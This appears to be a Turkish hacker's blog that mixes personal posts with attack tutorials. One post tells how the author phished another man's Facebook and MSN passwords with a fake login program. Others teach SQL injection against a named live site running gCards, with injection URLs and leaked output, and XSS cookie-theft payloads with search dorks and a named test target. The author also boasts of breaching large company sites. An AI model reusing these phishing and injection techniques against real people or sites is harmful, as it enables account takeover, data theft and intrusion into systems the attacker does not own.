Bizim evin 2 sokak ötesinde ki bir arkadaşta toplandık sohbet ediyorduk.Birden konu pc konusuna geldi.İşte şifre mifre derken bir arkadaştan bahsettiler.Adı Barış'mış para karşılığında msn ve facebook hackliyormuş.
Bende merak ettim nedir bu filan diye biraz arkadaşlar işte konuştuk arkadaşın bilgisayarında ki konuşmalara baktım filan.Adamın taktik şu ilk kendine bir kurban seçiyor.Bunu ortak arkadaşlardan seçiyor.Sonra o kişinin facebook adresini 3 kişiye kod gönder taktiği yada gizli soru ile hackliyor.Sonra size geliyor bende bunun şifresini var istermisin şeklinde birşeyler diyor.Bende direk hani bunu hackle diyince hackliyor zanletmiştim.Sonra ÇAKALLL dedim.
Bende kendi kendime inat ettim.Biraz sm biraz cinlik ile bende onu hackledim nasıl hackledim onu bir anlatam dedim.

İlk basit bir form mail düşündüm giriş yapınca şifreler bana gelicek şeklinde ama adamın biraz zeki olduğunu varsaydım.Bende bir program taktiği uyguladım.İnternetten c++ ile kodlanmış bir form buldum.Adam bilgileri girdiği zaman size mail olarak geliyordu.Üzerinde biraz çalıştım bunu facebook messenger gibi birşey yaptım.(sadece login kısmı)Yaptırdım desem daha doğru olur sanki benden çok arkadaşa yaptırdım ^^ Yani görünümü msn gibi ama facebook üzerinden.Facebook'un artık böyle bir uygulama yaptığu şeklinde yediricektim.Ardından bunu adama açtırma ve login olma kısmı kalmıştı.
Burada biraz takıldım ama değişik bir yöntem buldum.
Facebook tarafında bir açık olduğunu bununla ilgili olarakta php bir script olduğunu söyledim.Tabi ki başka bir isimle.Bunu bir siteye attığı zaman eğer başkası linke tıklarsa direk olarak tıklayan kişinin loglarının geleceğini söyledim.Fakat bu bilgileri almak için facebook programında giriş yapıp mesajlar kısmına gitmesi gerektiğini söyledim ve adama attım.Açıkçası adamın gerçekten yiyeceğini düşünmüyordum ama gitti yedi ve programdan login oldu.Daha doğrusu öyle zanletti programda eğer login olmaya çalışırsanız girilen değeler bana mail olarak geliyor ve sizi facebook.com adresine yönlendiriyor.Tam bana bilgiler geldiği sırada adama facebook üzerinden kendi açtığım boş bir facebook şifresi attım.Adam da aaa geliyormuş dedi ama program tarafında değildi program çalışmadı facebook.com üzerinden baktı buradan bir işkillenmesi lazımdı.Birşey olmadı demek ki birşey bilmiyormuş.Adamın facebook şifresi ile msn şifresi de aynı çıktı şuan 2'side bende.Bakalım belki geri veririm uyuzluk değilmi !!
Buna sm demelimiyim bilemedim adam fazla saf geldi sanki.

Spartacus öldü!

Sevdiğim beğendiğim bir dizi idi.İnternette dolaşırken şimdi gördüm.Zaten lenf kanserin ile mücadele ettiğini okumuştum.Bu sabah yenik düşerek 39 yaşında vefat etmiş.Üzüldüm...
(Andy Whitfield)

Sql İnjection

Selamun aleyküm arkadaşlar.
Bugün sizlere sql injection'dan bahsedicem.
Aslında bu anlattıklarım internette var kendi anlattığımda birçok sql dersi var fakat bu tip toplu bir anlatım yok.Benzeri vardır belki de fakat yaptığım aramalarda böyle hepsinin olduğu büyük arşiv tipi bir sonuç bulamadım.Buda DDz farkı olsun değil mi :)

Belirli başlıklar altında inceleyeceğiz bu başlıklar;

1)Giriş
2)Neden Kaynaklanır
3)Url İnjection
4)Blind Sql İnjection
5)Blind Injection Ascii Mantığı
6)ASP Sql Injection
7)SQL Injection Üzerinden LFI
8)Ms Access SQL Injection
9)Mysql İnjection
10)Load_file kullanımı
----------------------------------------

1)Giriş
İlk olarak sizlere nasıl okunduğundan bahsedelim yanlış kavramayın.Okunuş şekli esquel injekşın'dır.Neden bundan bahsettin derseniz bana kimse okunuşunu demedi ben internetten dökümanlardan öğrendim okurken de sukul injeksiyon diyordum ilk öğrendiğimde ^^ soralarında öğrendim esquel injekşınmış.
Sql açıkları günümüzdeki en populer açıklardan biridir.Çok büyük sitelerde bile çok rahat bir şekilde oraya çıkabiliyor.Örneğin ben sql ile turktelekom bmw isuzu gibi birçok siteye bastım.
Yani 2009'un rfı'ı gibidir.Ayrıca bu günlerde herkes siteleri hackledi sistemler değişti artık bu sistemlerde açık yok gibi düşünmeyin bir bakın bakalım yeni sitemde neler var mantığı nedir neler olabilir.
Zaten şu günlerde xss ve sql injection en çok kullanıyor.Joomla sitelerde zaten açık bol bol.Joomla olmasa nabardık acep diyor insan.Birde şu lanet sql programları var havij m4x vsvs.Bunlar da adamın öğrenmesini sınırlıyor.Tamam kullanın bir sorun yok ama en azından manuel olarak nasıl yapılacağını bilin.Adam sisteme bir ddos koruması koyuyor.Doğal olarak havij saniyede 7 tane talep gönderiyor get isteği yapıyor ve banlanıyorsunuz.Elle yapmanız lazım bilmiyorsunuz bırakıyorsunuz.Zaten bu anlatımları yapmamım amacıda bu kafanızda bir şeyler oluşması.Bu programları insanları kör ettiği için sevmiyorum.2-3 sene önce adamlar sql'in s'sini bilmiyorlardı şimdi de bu sql programlarını kullanmayı bildiklerini için uzmanlık alanlarına ekliyorlar.Hemen 2-3 tane örnek verebilirim :)

Ün Tv uyarıldı.

Mailde filan unye diyor ama sitede ün tv diyor , ün var tv de var orası garanti...

Script'te bug bulma.

Selamun aleyküm arkadaşlar.
bugün sizlere scriptlerde bug bulmayı anlatıcam.(SQL)
Bu script'te daha önce bulunmuş exploit-db'den zaten buldum script'i hani boşu boşuna gelip bulunmuş
demeyin sadece anlatım için kullanıyorum.Birde sen konuyu açıyorsun ama 1 tane bile açık bulduğunu görmedik
diyenler ve düşünenler içinde şuanda benim kendime ait buldum 20-30 tane açık var ama yayınlamıyorum.
Graytendril biliyor(gray'dada sağlam şeyler var ona göre :D)Yayınlamamamın nedeni paylaştıkça cılkı çıkıyor.
Adamlar Türk sitelerine index atıyorlar.Yani ben bunu istemiyorum açıkcası bende kalsın :)

Neyse amma konuştum daha başlamadan şimdi öncelikle bizim bulacağımız sql injection bug'ıdir.Yani sql ile ilgili
scipt'teki sql injection açığı.

gCards 1.47 üzerinden göstericem ben.
indirme linki : http://www.gregphoto.net/gcards/down...gcards1.47.zip
İndiriyoruz ve dosyaları temiz bir yere çıkarıyoruz.

 

Şimdi sql açıkları genelde bu şekilde açığa çıkar bunları bulucaz;

<?php
$id= $_GET[’id’];
......................................
$query= "SELECT * FROM users WHERE id= ’ “ .$id." ;"
......................................
?>


Burada ne var filtrelenme yok yani '^+^+&+/%)/ gibi özel karakterlerin filan filtrelenmesi lazım.
Bizde script'te bu tip şeyler arıcaz.

Ben script'teki php dosyalarını notepad ++ ile açıcam.Sizede öneririm iyidir.
Scriptteki dosyalarda arama yapıyoruz.
Bir script'te arıyacaklarımız : $_GET , SELECT * FROM'dur.
Ve getnewsitem.php dosyasında şöyle bir kod çıktı.

 

çıkan kodlarımız bunlar;

$newsid = (int) $_GET['newsid'];
$getNewsSQL = "SELECT * from ".$tablePrefix."news WHERE newsid=$newsid";

Açığın bulunduğu dosya bu.
Bulduk şimdi bakıcaz sistemde bu açık nerede acep nerede bulunuyor.
Denemelik sitemiz bu : http://floridacards.com/gcards/
Açık getnewsitem.php dosyasındaydı o zaman.

http://floridacards.com/gcards/getnewsitem.php
news WHERE newsid=$newsid";
olduğu için doğal olarak;

http://floridacards.com/gcards/getnewsitem.php?newsid=1
Şeklindedir.

siteye bakarsanız ;
http://floridacards.com/gcards/getnewsitem.php?newsid=1
dediğnizdeki yazılara bakın sonrada ' koydun
http://floridacards.com/gcards/getnewsitem.php?newsid=1'
bakın değişikliği göreceksiniz.
http://floridacards.com/gcards/getne...on%28%29,4,5--
version 5.1.56-log

İşte script'te açık buldunuz ister yayınlayın ister size kalsın...

Mr.PaPaRoSSe / DarkDevilZ / :& = elim kolum bağlı...

Ps ?

Vay anasını ya ps yapmaya yapmaya nasıl yapılır unutmuşuz anca bunu yaptım.

XSS Nedir ki ?

Selamun aleyküm arkadaşlar konumuz xss.Aşağıda belirli başlıklarla bunu açıkladım.xss giriştir...

Xss Nedir ?
İlk olarak xss nedir necidir ondan başlıyalım.Açılımı Cross Site Scripting yani Çapraz Kod
Çalıştırma anlamına gelmektedir.Sitenin herhangi bir yerindeki script kodlarına yerleştirilecek
kodlarla site admin cookielerine ulaşarak sisteme giriş yapabileceğimiz saldırı türüdür.
arama bölümlerinde,haberlerde filan birçok yerde bulunabilir.

XSS Bulmak ?

Açığı bulmak için birçok tool var internette zaten ama programsız nasıl olucak onu anlamak önemli zaten..
Çoğu kişi sadece ekrana adını getiriyor ve bırakıyor buda bir acayipliktir...

Kullanılan 1-2 xss kodu;

<script>alert(document.cookie)</script>
<IMG SRC="javascript:alert('XSS');">
"><script>alert("DarkDevilZ / Mr.PaPaRoSSe")</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
vs vs

http://ha.ckers.org/xss.html

Bu sitede farklı xss kodları mevcut kodlar için bu siteyi kullanabilirsiniz.

Xss bulmak için google'da;

inurl:Search.php
inurl:Search.asp
inurl:arama.php
inurl:Arama.asp
inurl:Ara.asp
inurl:Ara.php

gibi aramalar yapabilirsiniz.

Peki açık varmı yokmu nasıl anlıcaz diyorsanız onuda gösterelim google'da bir arama yapalım..
inurl:Search.php

Şimdi böyle bir site rast geldi.

http://www.sinternet.com/search.php

 

şimdi
"><script>alert(document.cookie)</script>
yazıp enter diyoruz böylece ekrana bakalım birşey gelecekmi gelirse açık vardır...

 

Şimdi bununla ne yaparız yani xss ile ne yapabiliriz?
Her site sizin daha önce giris yaptığınızı anlamak için bir cookie oluşturur.
Bizde xss ile bu bilgileri çalabilir ve kendi cookie'mizi admininkiyle değiştirebiliriz.(Değiştirme için firefox'un bir eklentisi var ama unuttum :) )
Böylece siteye admin dediğinizde (panelin admin olduğunu farz edin) admin gibi panele giris yapacaksınız.



Açığın Kapatılması?

açık çok basit bir şekilde kapatılabilinir.
; / ? : @ = & <> “ # { } | \\\\\\\\ ^ ~ [ ] ` % ‘
gibi karakterler filtrelenmelidir.

yada sitenin ana dizinindeki .htaccess'e bunlar eklenmeli;

RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\\\\\\\(.*\\\\\\\\) [OR]
RewriteCond %{QUERY_STRING} (\\\\\\\\<|<).*script.*(\\\\\\\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\\\\\\\[|\\\\\\\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\\\\\\\[|\\\\\\\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]


Alıntı-Filan değil hea / Mr.PaPaRoSSe / DD'z

Listem

Music List
Genelde ben hack yaparken,tasarım yaparken yada oturup birşey yapmalıyım derken winamp ile çalan müzik listemi yayınlıyorum.Sürekli en başa döner aynı parçalar çalar :) Yaklaşık 2000 tane şarkı var ama bir şeyler yaparken bunlar çalar.Tabi ki bazen başka şeylerde ekleyebiliyorum aralara ^^

1-)  Dandy Warhols - We Used To Be Friends
2-)  Kenya West - Stronger (İlhamcı şarkım <3)
3-)  Tiesto - Ayla (Adamsın tiesto :))
4-)  Akcent - My Passion
5-)  David Guetta Feat. Flo Rida & Nicki Minaj - Where Dem Girls At
6-)  Elvis Presley - A Little Less Conversation (Seviyorum Hacı)
7-)  Skillet - Whispers In The Dark
8-)  Sidekick - Deep Fear
9-)  Timbaland Feat. One Republic - Apologize
10-) Vodafone Free Zone - Özgürce Yaşa (Listedeki Tek Türk Şarkı Olma Şerefi...)
11-) Rise Against - Under The Knife
12-) 12 Stones - Anthem For The Underdog
13-) Edward maya ft. alicia - stereo love
14-) Eminem - Lose Yourself (adam king)
15-) Evanescence - Bring Me to Life
16-) Katy Perry - E.T
17-) Kid Cudi - Day N Nite
18-) Madcon - Begging
19-) The Red Jumpsuit Apparatus - False Pretense
20-) Festival - Sigur Rós 127 Hours Soundtrack(Belki biraz sıkıcı bulursunuz ama 127 hours adlı filmdeki kurtulma sahnesinde çalıyor ortalarda filan güzel.)

Exploit Nasıl Yazılır (webapps)

Piton'ca exploit nasıl yazılır :P

Selamun Aleyküm Arkadaşlar.
İçimden bir ses sürekli anlatım yap diyor bende o sese hep kulak veriyorum.
(Bazıları beni ne kadar anlatım yapmaktan vazgeçirmeyi amaçlasa da...)

Sanırım artık bu exploit işlerine bug bulmalara filan pek önem verilmiyor.Neticede exploit-db 1337day gibi siteler var.Herkes pusuda bekliyor ve ilk yayınlanan exploiti yada açığı kapma yarışı başlıyor ki bunlar yanlış şeyler.Yani orada yayınlanmasını bekleyeceğinize sizler birşey bulmalısınız.Genelde zaten çok önemli şeyleri insanlar paylaşmazlar.Yada işte kullanırlar kullanırlar artık son 1-2 site filan kalır öyle paylaşırlar.Sonuçta artık sizin de bir kendinize haydi adamım başlıyalım deyip bir atak yapmanız lazım.Gidip script'leri indirmeniz incelemeniz lazım.Şöyle bakın 2-3 hafta indirin bir inceleyin daha önce incelenmemiş yada bug bulunmamış yada yeni sürüm bir script'i.Elbet birşeyler bulacaksınız.Ve sonra fark edeceksiniz ki sizin o pusuda bekleyip yayınlayanlara ihtiyacınız kalmamış artık onların size ihtiyacı var.Şunu da belirtelim bir exploit yazarken işte bug bulurken yada bir sistem kodlarken birşeyler yaparken ingilizce çok önemlidir.En azından orta seviye bir ingilizceniz olursa daha iyi ilerleme gösterirsiniz.Yani adamın hiç ingilizcesi yok bu exploiti 5 haftada yazamaz ama sizin var en fazla 1 hafta oda işte 7/24 bu exploit ile uğraşacak haliniz yok arada kapatırsın hack yaparsın canın yazmak istemez vsvs..

Şimdi fazla dağıtmadan konuya gelelim yoksa ben 3-5 sayfa konusurum...
Bizim yazacağımız exploitler daha web tabanlı.Yani onun dışında remote exploitler filan var onların yazılması başka birşey zaten :) (enteresting)

Bizim yazacağımız bir sql(esquel injekşın) exploit'idir...
elimde bulunan bir sql exploit vardı öyle yazık duruyordu bende onun üzerinden anlattım.
Daha önce script'te sql bug nasıl bulunur onu anlatmıştım pek görülmedi yada ilgi gösterilmemiştir belki de kim bilir...

Wordlist Python / Düşünce...

Brute force number list with python :P

Selamun aleyküm arkadaşlar.
Python işe düşündüğüm birşeyi anlatıcam.
Daha bunun hani oturup şöyle şöyle kodlamalıyım diye birşey düşünmedim bu sadece birtür beta demo gibi birşeydir.Şimdi aklıma geldi.
Amaç brute force için sayılardan oluşan bir wordlist yapılması.

İsyan

Selamun aleyküm arkadaşlar.
Herkes ilk blog açtığında Merhaba Evren filan birşeyler yazar bende
adettendir diye Merhaba İnternetteki Yaşam diyorum.
Gecen açtığım wordpress'i adamlar gitti kapattı.Nede güzel devam ediyordu çok kıllandım.
Wordpress artık yenin düşmanın var BEN!
Bundan sonra bunu kullanıcam.Sanırım kapatmazlar :P